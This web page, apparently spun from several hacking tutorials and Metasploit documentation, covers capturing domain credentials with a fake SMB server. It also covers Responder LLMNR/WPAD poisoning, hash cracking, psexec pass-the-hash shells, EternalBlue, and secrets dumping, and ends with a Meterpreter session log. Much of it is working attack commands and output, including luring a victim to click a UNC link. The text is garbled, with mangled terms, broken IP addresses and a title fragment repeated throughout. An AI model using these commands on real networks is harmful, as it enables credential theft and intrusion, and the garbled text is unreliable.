Creating a Fake SMB Server to Capture Crede
Creating a Fake SMB Server to Capture Crede In a preceding tutorials in this Metasploit basics collection, we found out how to use hashdump to tug password hashes from a local machine.
In each of these cases Creating a Fake SMB Server to Capture Crede:
In “Cracking Passwords with Hashcat”, you learned the way to crack these hashes with hashcat.
, the password hashes had been the passwords of the users on the nearby gadget and not the domain. If the device is a part of a website (that’s the case in most organizations and big institutions), they will possibly have their password stored at the domain controller (DC). How would we get the area passwords with out attacking the fortified domain controller Creating a Fake SMB Server to Capture Crede?
one of the greater powerful functions built into Metasploit is the capacity to installation a fake SMB server. which means when someone at the community attempts to get entry to the SMB server, their machine will want to give their credentials in terms in their domain password hash. Very regularly, large networks have a device that systematically connects to each gadget to test whether or not they may be patched and comfy. when it does so, it ought to present its credentials to every device and this will generally use the admin password. If we’re patient, this will be the nice method Creating a Fake SMB Server to Capture Crede.
similarly, via putting in place this faux SMB server
we can be able to capture domain credentials as customers try to authenticate against it. We should ship the goal an embedded UNC course, and once they click on it, we are able to snatch their domain credentials.
in contrast to a number of our other Metasploit attacks, this is neither an exploit or a payload. it’s far an auxiliary module, and is able to shooting the hash in a layout to be damaged the usage of both Cain and Abel, the very capable however slow home windows cracker, or John the Ripper, likely the oldest password cracker nevertheless available on the market Creating a Fake SMB Server to Capture Crede.
Step 1: fireplace Up Kali and begin Metasploit
let’s begin by means of firing up Kali and commencing certainly one of my favourite hacking equipment, Metasploit, via typing Creating a Fake SMB Server to Capture Crede:
kali > msfconsole
whilst we do, we are greeted by the very acquainted Meatsploit splash display screen.
Step 2: set up the SMB Server Creating a Fake SMB Server to Capture Crede
Now that we’ve Metasploit open, let’s installation a faux SMB server. not like some of our other Metasploit assaults, this one is neither an take advantage of or payload, but alternatively an auxiliary module. we are able to start it by coming into Creating a Fake SMB Server to Capture Crede:
Now that we’ve loaded this module, permit’s check the options we need to set to apply this module.
msf >display options
As you can see, this module has numerous options, however we will go away the default settings on each of them, except for the record type to keep the hashes for cracking Creating a Fake SMB Server to Capture Crede.
note, i have highlighted the JOHNPWFILE alternative above. We additionally have the CAINPWFILE at the very pinnacle. these options permit us to decide the format of the document storing the hashes for cracking via Cain and Abel or John the Ripper. on this academic, i’ll be the usage of the latter tool Creating a Fake SMB Server to Capture Crede.
To achieve this, I really need to inform this module to “set” the JOHNPWFILE to a particular area with the aid of typing Creating a Fake SMB Server to Capture Crede:
msf > set JOHNPWFILE /root/domainhashes
Now, all that is left to do is “take advantage of.”
msf > exploit Creating a Fake SMB Server to Capture Crede
when we kind “take advantage of,” this module will start a faux SMB server that will keep the presented credentials inside the /root directory in documents starting with “johnhashes”.
Step three: percentage
Now that our SMB server is walking, we need a person to attempt to login to our percentage. we are able to do this through sending a UNC hyperlink to our proportion, including:
internet use \192.168.1.106 occupytheweb
when they click on that hyperlink, their area credentials will be presented to our SMB server and captured as in the screenshot beneath Creating a Fake SMB Server to Capture Crede.
Step four: Crack the Hash
The final step is to crack the hashes to attain the password. We want to visit the /root listing to locate the stored hash files Creating a Fake SMB Server to Capture Crede.
kali > cd /root
As you could see, there are hashes saved right here. Now to crack them, we are able to use John the Ripper (its built into Kali) with the aid of typing:
kali > john johnhashes_netlmv2
whilst we do so, John the Ripper loads the password hash, recognizes the sort of hash, and starts offevolved cracking it. depending upon the duration and complexity of the password, john will take mins to days to crack the hash, but whilst it is carried out you may have the password of the person who clicked on your UNC hyperlink and have full run of the computer!
evaluation & gear Creating a Fake SMB Server to Capture Crede
for you to be able to complete this project, it is right practice to begin the responder in analyzing mode with the choice -A Creating a Fake SMB Server to Capture Crede.
python Responder.py -I eth0 -A
This manner we are able to get a top level view of the regular site visitors of the network and see if there are any NACs (network get right of entry to Controls). From this point we will without difficulty exclude them through modifying the Responder.conf placing their IP at the voice DontRespondTo. in any other case, if we want to goal precise IP alternatively, we might must insert them into the voice RespondTo.
Now we’re geared up to seize a few hashes with the following command:
python Responder.py -I eth0 Creating a Fake SMB Server to Capture Crede
when a purchaser attempts to solve a name not inside the DNS, Responder will poison the LLMNR (hyperlink-nearby Multicast name decision), NBT-NS (NetBIOS call carrier) and spoof SMB Request with the intention to grab NetNTLMv2 hash.
responder-to-capture-netntml_1 Creating a Fake SMB Server to Capture Crede
once the hash has been received, we will proceed cracking it or we will relay it to another device. i love cracking passwords, so…
To crack the hash, we can use Hashcat, a tool for password recuperation. We run:
hashcat -m 5600 hash.txt rockyou.txt;
in which -m is used to specify the sort of hash that we need to crack, hash.txt is our hash and rockyou.txt is our dictionary.
responder-to-capture-netntml_2 Creating a Fake SMB Server to Capture Crede
we will use the credentials obtained to spawn a shell the usage of psexec (a tool from impackt) with the command: Creating a Fake SMB Server to Capture Crede
python psexec.py ‘Jackie Chan’:[email protected] Creating a Fake SMB Server to Capture Crede
responder-to-capture-netntml_3 Creating a Fake SMB Server to Capture Crede
We can also use Responder for another assault that allows us to poison the WPAD request. In a corporation community a proxy is generally used to attain out to the internet community. but how can a computer knows which proxy is used? To solve this hassle a pc routinely searches for WPAD (internet Proxy car Discovery) server.
What Responder does with the command python Responder.py -I eth0 -wFr is to create a fake WPAD server and so it responds to the consumer with its IP. Then, while the patron tries to get the wpad.dat, Responder creates an authentication display asking the purchaser to go into username and password used inside the area. The credentials are showed in the terminal in plaintext.
), is a way for sharing files throughout nodes on a network.
There are two major ports for SMB: Creating a Fake SMB Server to Capture Crede
139/TCP – first of all Microsoft carried out SMB ontop of their current NetBIOS network architecture, which allowed for home windows computer systems to speak across the equal network
445/TCP – more moderen variations of SMB use this port, were NetBIOS isn’t always used.
different terminology to be aware about:
SMB – Serer Message Blocks
CIFS – common net record gadget
Samba – A unfastened software program re-implementation of SMB, which is regularly discovered on unix-like structures Creating a Fake SMB Server to Capture Crede
Metasploit has support for more than one SMB modules, together with:
version enumeration
Verifying/bruteforcing credentials Creating a Fake SMB Server to Capture Crede
capture modules
Relay modules
record switch Creating a Fake SMB Server to Capture Crede
take advantage of modules
There are more modules than listed here, for the overall listing of modules run the hunt command inside msfconsole:
msf6 > seek mysql
Lab surroundings Creating a Fake SMB Server to Capture Crede
while trying out in a lab environment – SMB may be used on a Window’s host system, or within Docker.
for example strolling Samba on Ubuntu sixteen.04:
docker run -it –rm –publish 127.zero.zero.1:139:139 –publish 127.zero.0.1:445:445 ubuntu:16.04 /bin/bash
mkdir -p /tmp/foo Creating a Fake SMB Server to Capture Crede
apt replace
apt deploy -y samba
Verifying version is as anticipated:
$ samba –version Creating a Fake SMB Server to Capture Crede
model 4.3.11-Ubuntu
Configuring the proportion:
cat << EOF >> /and so on/samba/smb.conf
[foo_share]
comment = Foo samba share
route = /tmp/foo
examine best = no
browsable = sure Creating a Fake SMB Server to Capture Crede
EOF
Restart the carrier:
service smbd restart
SMB Enumeration
Enumerate SMB model:
use auxiliary/scanner/smb Creating a Fake SMB Server to Capture Crede/smb_version
run smb://10.10.10.161
Enumerate stocks: Creating a Fake SMB Server to Capture Crede
use auxiliary/scanner/smb/smb_enumshares
run smb://10.10.10.161
run smb://person:[email protected]
run ‘smb://domain;person with areas:[email protected]’ SMB::AlwaysEncrypt=fake SMB::ProtocolVersion=1
Enumerate shares and display all files recursively:
use auxiliary/scanner/smb/smb_enumshares Creating a Fake SMB Server to Capture Crede
run ‘smb://person:pass with a [email protected]’ showfiles=authentic spidershares=genuine
Enumerate customers: Creating a Fake SMB Server to Capture Crede
use auxiliary/scanner/smb/smb_enumusers
run smb://user:[email protected]
Enumerate gpp files in a SMB percentage:
use auxiliary/scanner/smb/smb_enum_gpp Creating a Fake SMB Server to Capture Crede
run smb://192.168.123.thirteen/share_name verbose=actual keep=actual
run smb://consumer:[email protected]/share_name verbose=real keep=proper
SMB Server
Create a mock SMB server which accepts credentials earlier than returning NT_STATUS_LOGON_FAILURE. these hashes can then be cracked later:
use auxiliary/server/seize/smb
run
SMB MS17-010
Metasploit has a module for MS17-010, dubbed everlasting Blue, which has the functionality to goal home windows 7, windows 8.1, home windows 2012 R2, and home windows 10.
Checking for exploitability:
use auxiliary/scanner/smb/smb_ms17_010
test 10.10.10.23
check 10.10.10.zero/24
take a look at smb://consumer:[email protected]/
check smb://area;person:[email protected]/
take a look at cidr:/24:smb://user:[email protected] threads=32
As of 2021, Metasploit helps a unmarried take advantage of module for which has the capability to target windows 7, home windows eight.1, home windows 2012 R2, and windows 10, complete info within the Metasploit Wrapup:
use make the most/home windows/smb/ms17_010_eternalblue
run 10.10.10.23 lhost=192.168.123.1
run 10.10.10.0/24 lhost=192.168.123.1 lport=5000
run smb://consumer:[email protected]/ lhost=192.168.123.1
run smb://area;consumer:[email protected]/ lhost=192.168.123.1
SMB psexec
going for walks psexec towards a remote host with credentials:
use exploit/windows/smb/psexec
run smb://user:[email protected] lhost=192.168.123.1 lport=5000
jogging psexec with NTLM hashes:
use take advantage of/home windows/smb/psexec
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.thirteen lport=5000
SMB Dumping
Dumping secrets and techniques with credentials:
use auxiliary/gather/windows_secrets_dump
run smb://consumer:[email protected]
Dumping secrets with NTLM hashes
use auxiliary/acquire/windows_secrets_dump
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected]
SMB documents
down load a report:
use auxiliary/admin/smb/download_file
run smb://a:[email protected]/my_share/helloworld.txt
add a report:
use auxiliary/admin/smb/upload_file
echo “my record” > local_file.txt
run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt
Kerberos Authentication
details on the Kerberos precise alternative names are documented in Kerberos provider Authentication
walking psexec in opposition to a host:
msf6 > use make the most/windows/smb/psexec
msf6 make the most(home windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.thirteen smb::rhostname=dc3.demo.nearby area=demo.neighborhood
[*] 192.168.123.13:445 – Connecting to the server…
[*] 192.168.123.13:445 – Authenticating to 192.168.123.thirteen:445|demo.neighborhood as consumer ‘Administrator’…
[+] 192.168.123.thirteen:445 – 192.168.123.13:88 – acquired a valid TGT-reaction
[*] 192.168.123.13:445 – 192.168.123.13:445 – TGT MIT Credential Cache ticket stored to /customers/consumer/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
[+] 192.168.123.thirteen:445 – 192.168.123.thirteen:88 – acquired a valid TGS-response
[*] 192.168.123.13:445 – 192.168.123.13:445 – TGS MIT Credential Cache ticket saved to /users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
[+] 192.168.123.13:445 – 192.168.123.thirteen:88 – received a legitimate delegation TGS-reaction
[*] 192.168.123.13:445 – selecting PowerShell target
[*] 192.168.123.thirteen:445 – Executing the payload…
[+] 192.168.123.13:445 – carrier start timed out, adequate if jogging a command or non-service executable…
[*] Sending stage (175686 bytes) to 192.168.123.13 In each of these cases Creating a Fake SMB Server to Capture Crede:
[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.thirteen:49738) at 2023-01-18 12:09:13 +0000
